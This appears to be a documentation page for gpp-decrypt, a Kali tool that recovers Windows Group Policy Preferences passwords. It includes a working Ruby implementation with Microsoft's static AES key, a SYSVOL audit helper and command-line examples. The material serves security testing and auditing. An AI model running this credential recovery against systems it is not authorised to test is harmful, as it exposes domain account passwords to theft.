GPP-Decrypt
A simple Ruby script that decrypts Group Policy Preferences (GPP) encrypted strings. It recovers passwords from GPP XML files found in Windows environments.
Description
gpp-decrypt is designed to decrypt encrypted strings from Group Policy Preferences, which Windows used to store passwords in XML files. Decrypting these strings yields the cleartext account passwords, which makes the files a valuable target in penetration testing and red team operations. The tool addresses a specific weakness in older Windows Group Policy configurations where passwords were not properly protected.
Use cases include post-exploitation scenarios where attackers obtain GPP files from domain controllers or SYSVOL shares. Security professionals use it to demonstrate risks associated with default GPP password storage, highlighting the need for proper configurations and monitoring. It serves as an educational tool for understanding legacy Windows security flaws.
The script is lightweight and relies on Ruby, making it easy to deploy in Kali Linux environments for quick password recovery during assessments.
How It Works
The tool implements the decryption algorithm used by Windows for Group Policy Preferences passwords. It takes a base64-encoded GPP string, applies the known AES decryption key and IV hardcoded in the script (derived from Microsoft documentation), and outputs the plaintext password. This exploits the static crypto material exposed by Microsoft in 2012.
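The decryption step described above, written out in Ruby as an added example (this is not the gpp-decrypt script itself). The 32-byte AES key and all-zero IV are the values Microsoft published in the MS-GPPREF specification; cpassword attributes in GPP XML carry base64 with the trailing "=" padding stripped and decrypt to a UTF-16LE string, so both are handled. The Groups.xml fragment, the account names and the password "Winter2024!" are constructed for this example; the second cpassword value is the example string from this page. The audit helper is the defender's use of the same primitive: walk a SYSVOL XML file and report every leftover cpassword.

```ruby
require 'openssl'
require 'rexml/document'

# AES-256 key from Microsoft's MS-GPPREF specification ("Password Encryption").
# The same key was used for every GPP cpassword in every domain, which is why
# the encryption offers no real protection.
GPP_AES_KEY = [
  0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10,
  0x62, 0x0f, 0xfe, 0xe8, 0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90,
  0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b
].pack('C*').freeze
GPP_AES_IV = ("\x00" * 16).freeze # fixed all-zero IV, also from the spec

# cpassword values are base64 with the '=' padding removed; restore it so the
# decoder sees whole 4-character groups, then AES-256-CBC decrypt and convert
# the UTF-16LE plaintext to UTF-8.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = GPP_AES_IV
  plain = cipher.update(padded.unpack1('m0')) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse operation, used here only to build a constructed test vector.
def encrypt_cpassword(password)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = GPP_AES_IV
  data = password.encode('UTF-16LE')
  [cipher.update(data) + cipher.final].pack('m0').delete('=')
end

# Audit helper: find every element carrying a cpassword attribute in a GPP XML
# document (Groups.xml, Services.xml, ...) and return [account, result] pairs.
# A malformed value is reported rather than aborting the whole scan.
def audit_gpp_xml(xml_text)
  doc = REXML::Document.new(xml_text)
  findings = []
  REXML::XPath.each(doc, '//*[@cpassword]') do |el|
    name = el.attributes['userName'] || el.attributes['name'] || el.name
    begin
      findings << [name, decrypt_cpassword(el.attributes['cpassword'])]
    rescue OpenSSL::Cipher::CipherError, ArgumentError => e
      findings << [name, "undecryptable: #{e.class}"]
    end
  end
  findings
end

# Constructed Groups.xml fragment (hypothetical accounts). The first cpassword
# is generated above; the second is the example string from this page.
SAMPLE_GROUPS_XML = <<~XML
  <Groups>
    <User name="localadmin">
      <Properties action="U" userName="localadmin"
                  cpassword="#{encrypt_cpassword('Winter2024!')}"/>
    </User>
    <User name="svc_backup">
      <Properties action="U" userName="svc_backup"
                  cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  audit_gpp_xml(SAMPLE_GROUPS_XML).each { |account, result| puts "#{account}: #{result}" }
end
```

Running the script against a real SYSVOL copy means replacing SAMPLE_GROUPS_XML with the contents of each Groups.xml, Services.xml, ScheduledTasks.xml or DataSources.xml found under the Policies directory; any hit is a credential that should be rotated and the preference item removed.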
Installation
sudo apt install gpp-decrypt
Examples
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
gpp-decrypt [base64-encoded-gpp-string]
echo 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw' | gpp-decrypt
gpp-decrypt [password-from-sysvol-gpp-xml]
gpp-decrypt cGFzc3dvcmQ=
root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw